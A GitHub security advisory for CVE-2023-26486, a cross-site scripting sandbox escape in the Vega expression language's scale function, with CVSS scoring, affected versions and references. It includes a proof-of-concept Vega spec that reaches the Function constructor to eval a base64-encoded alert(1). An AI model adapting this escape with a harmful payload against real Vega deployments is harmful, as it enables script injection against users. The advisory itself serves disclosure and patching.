Lucene search

GitHub Advisory DatabaseGHSA-4VQ7-882G-WCG4

HistoryMar 02, 2023 - 11:11 p.m.

Vega Expression Language `scale` expression function Cross Site Scripting

2023-03-0223:11:05

CWE-79

GitHub Advisory Database

github.com

vega

expression language

cross site scripting

arbitrary functions

javascript

vega online ide

poc

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

54.2%

JSON

Summary

The Vega scale expression function has the ability to call arbitrary functions with a single controlled argument. This can be exploited to escape the Vega expression sandbox in order to execute arbitrary JavaScript.

Details

The scale expression function passes a user supplied argument group to getScale, which is then used as if it were an internal context. The context.scales[name].value is accessed from group and called as a function back in scale.

PoC

The following Vega definition can be used to demonstrate this issue executing the JavaScript code alert(1);

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "data": [
    {
      "name": "XSS PoC",
      "values": [1],
      "transform": [
        {
          "type": "formula",
          "as": "amount",
          "expr": "scale('func', null,  {context: {scales: {func: {value: scale('func', 'eval(atob(\"YWxlcnQoMSk7\"))', {context: {scales: {func: {value: [].constructor.constructor}}}})}}}})"
        }
      ]
    }
  ]
}

This can be viewed in the Vega online IDE at https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA

Affected configurations

Vulners

Node

vegavegaRange<5.23.0

vegafunctionsRange<5.13.1

CPENameOperatorVersion
vegalt5.23.0
vega-functionslt5.13.1

CPE	Name	Operator	Version
	vega	lt	5.23.0
	vega-functions	lt	5.13.1

References

github.com/advisories/GHSA-4vq7-882g-wcg4

github.com/vega/vega/releases/tag/v5.23.0

github.com/vega/vega/security/advisories/GHSA-4vq7-882g-wcg4

github.dev/vega/vega/blob/72b9b3bbf912212e7879b6acaccc84aff969ef1c/packages/vega-functions/src/functions/scale.js#L36-L37

github.dev/vega/vega/blob/72b9b3bbf912212e7879b6acaccc84aff969ef1c/packages/vega-functions/src/scales.js#L6

nvd.nist.gov/vuln/detail/CVE-2023-26486

vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA